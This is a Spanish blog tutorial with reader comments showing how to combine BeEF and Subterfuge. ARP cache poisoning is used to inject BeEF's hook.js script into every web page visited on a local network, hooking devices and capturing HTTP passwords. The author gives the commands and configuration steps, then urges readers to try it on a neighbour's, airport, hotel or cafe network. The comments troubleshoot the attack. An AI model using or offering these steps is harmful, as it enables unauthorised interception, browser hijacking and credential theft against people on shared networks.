Beef & Subterfuge – Infectando la red

Beef&Subterfuge

Hola de Nuevo, hace poco les traje un post de como podemos usar Beef post de Beef. Ahora lo que les voy a traer es a como lo podemos adaptar para que junto a la herramienta de Subterfuge, puedas infectar la red local.

La idea es que podamos infectar a cualquier «victima» que se encuentre navegando en la red, sin necesidad de que entre a la web infectada de Beef, para así poder utilizar el framework sin que los usuarios que estén en la red LAN se dieran cuenta.

Ya vimos en el post de beef que para infectar tenemos que hacer dirigir a las victimas a una web especifica, ahora que pasaría si la victima se infectaría tan solo entrando a google, o comprobando su correo, o leyendo su diario favorito.

Esto es lo que verdaderamente llama la atención.

Voy a dar por sabido que ya tienen instalados los dos frameworks, beef viene por defecto en Kali, mientras que Subterfuge hay que instalarlo. post instalacion Subterfuge (el post es viejo, para el que tenga problemas con la instalación de la nueva versión, no dude en mandar un mensaje)

Ahora pasemos a la acción!

Lo primero que tenemos que hacer es comenzar los servicios de ambos frameworks

  • primero Beef
cd /usr/share/beef-xss
./beef -x

beef&sub00

Con esto damos inicio al servicio de beef, el cual por defecto usara el puerto «3000» Recuerdo que la funsion «x» es para limpiar la base de datos

  • Ahora Subterfuge
subterfuge -s 192.168.1.103:9000

beef&sub01

Con este comando damos inicio a los servicios de Subterfuge, la opción «s» es para especificar la ip y el puerto en el que queremos que corra el servicio, en mi caso la ip es «192.168.1.103» (ip local)

Una vez que los dos servicios están en alta, hay que fusionarlos. para que puedan trabajar juntos y de esta forma infectar la red.

para ello hacemos lo siguiente:

Una de las cosas mas importantes que tenemos que tener es el archivo (un javascript) que usa beef para infectar a las victimas y lo sacamos desde la consola en donde iniciamos el framework.

beef&sub02En mi caso es: http://192.168.1.103:3000/hook.js

ahora que tenemos esto nos dirigimos a subterfuge y entramos vía web. como mencione anteriormente la dirección es: http://192.168.1.103:9000/

beef&sub04Vieja y conocida web… cuantos buenos recuerdos…

Esta es la parte mas interesantes de todas, en donde hacemos la «fusión» de los frameworks.

Desplegamos el menú de Subterfuge (las tres lineas blancas situadas arriba a la derecha y por debajo de la palabra «Start»)

En «Exploit:» seleccionamos la opción de «custom-injection» o personalizar inyección.

Con la opción de «Payload» la dejamos por defecto «IFrame Injection» (es un elemento HTML que permite insertar o incrustar un documento html dentro de un documento html).

Y por ultimo en el casillero de «Custom Injection» es donde tenemos que pegar nuestro script, usando el código java infeccioso de beef, quedara de la siguiente forma:

http://192.168.1.103:3000/hook.js

le damos al botón «Apply»

beef&sub05Para comprobar si cargo correctamente el script, podemos corroborar en la consola donde esta iniciado el framework

beef&sub06

y ya tenemos nuestro script malicioso cargado a Subterfuge. Pero todavía no a comenzado a infectar nada, ya que tenemos que tenemos que iniciar el servicio de «ARP cache poison» dando clik a la palabra «Start» situada arriba a la derecha.

Nos aparecerá un cartel de advertencia diciendo que Subterfuge configurara automáticamente la red, y que en caso de querer hacerlo manual tendremos que entrar en la pestaña «Settings» le damos a «OK»

beef&sub07Ahora el servicio infectara toda la red:

beef&sub08Ahora desde un smartphone y una tablet voy a navegar por la red para ver como detecta y funcionan los framework

Al solo ingresar a una sola web, el sistema me infecto y detecto correctamente.

beef&sub09para corroborar que funcionaba a la perfección, podemos ver como desde un dispositivo (el smartphone) ingrese a google, y como desde el otro dispositivo (tablet) ingrese a mercadolibre

beef&sub10

Tablet

beef&sub11

Smartphone

Pero todo no terminaba aquí: ya no solo que estábamos infectados con el simple hecho de ingresar a cualquier web, sino que ademas teníamos todos los comando de Beef para poder ejecutar y también al haber infectado la red con Subterfuge podíamos captar cualquier contraseña que se este enviando (solo http, subterfuge no detecta https)

Busque un login en google para probar y Walaaa….

beef&sub12

Resultado de Infectar el teléfono:

Screenshot_2015-09-12-00-53-46

Espero que les haya gustado este post. y los dejo con mucha info para jugar. ahora se podrán divertir con la red del vecino, aeropuerto, Hotel, shopping, cafe, etc. etc.

La próxima ves iremos un paso mas adelante en eso, y tendremos todo bajo nuestro control (sisisi… mucho mas que lo que viste recién), agregando aun mas a esta gran fusión de Frameworks.

Video

Simplemente para terminar

Gracias Beef!

Gracias Subterfuge!

Publicado el 12/09/2015 en Kali Linux. Añade a favoritos el enlace permanente. 7 comentarios.

  1. Lo unico que no me aparece es el pane MITMF Vector:ARP Cache Poisoning alguna solucion ?

    • La opción para activar ARP Cache Poisoning esta en la sección de «Settings» tenes una pestaña «MITM Vectors» Nose si es esto a lo que te referis

  2. No me aparece el menU
    MITMF Vector:ARP Cache Poisoning con la opciones
    Running Exploit custon-injection Payload Frame Injection Custom Injection donde tu agregas el <script lenguaje:java , entro a a la seccion Settings le doy aplicar luego doy click en subterfuge pero no veo el cambio no veo el menu 😦 alguna foram de enviar una toma de pantalla para que pudieras apreciar mi problema ?

  3. Esta es la parte mas interesantes de todas, en donde hacemos la “fusión” de los frameworks.

    Desplegamos el menú de Subterfuge (las tres lineas blancas situadas arriba a la derecha y por debajo de la palabra “Start”)

    En “Exploit:” seleccionamos la opción de “custom-injection” o personalizar inyección.

    Con la opción de “Payload” la dejamos por defecto “IFrame Injection” (es un elemento HTML que permite insertar o incrustar un documento html dentro de un documento html).

    Y por ultimo en el casillero de “Custom Injection” es donde tenemos que pegar nuestro script, usando el código java infeccioso de beef, quedara de la siguiente forma:

    ESTE MENU NO ME APARECE ALGUNA SOLUCION ?

  4. ya hice todo al pie de la letra pero solo me captura paginas en las que navego subterfuge y beef ya lo inicie con mi ip y puerto y no me sale ningun dispositivo infectado aclaro ya lo hice de nuevo todo y beef no le sale ningun dispositivo saludos

Deja un comentario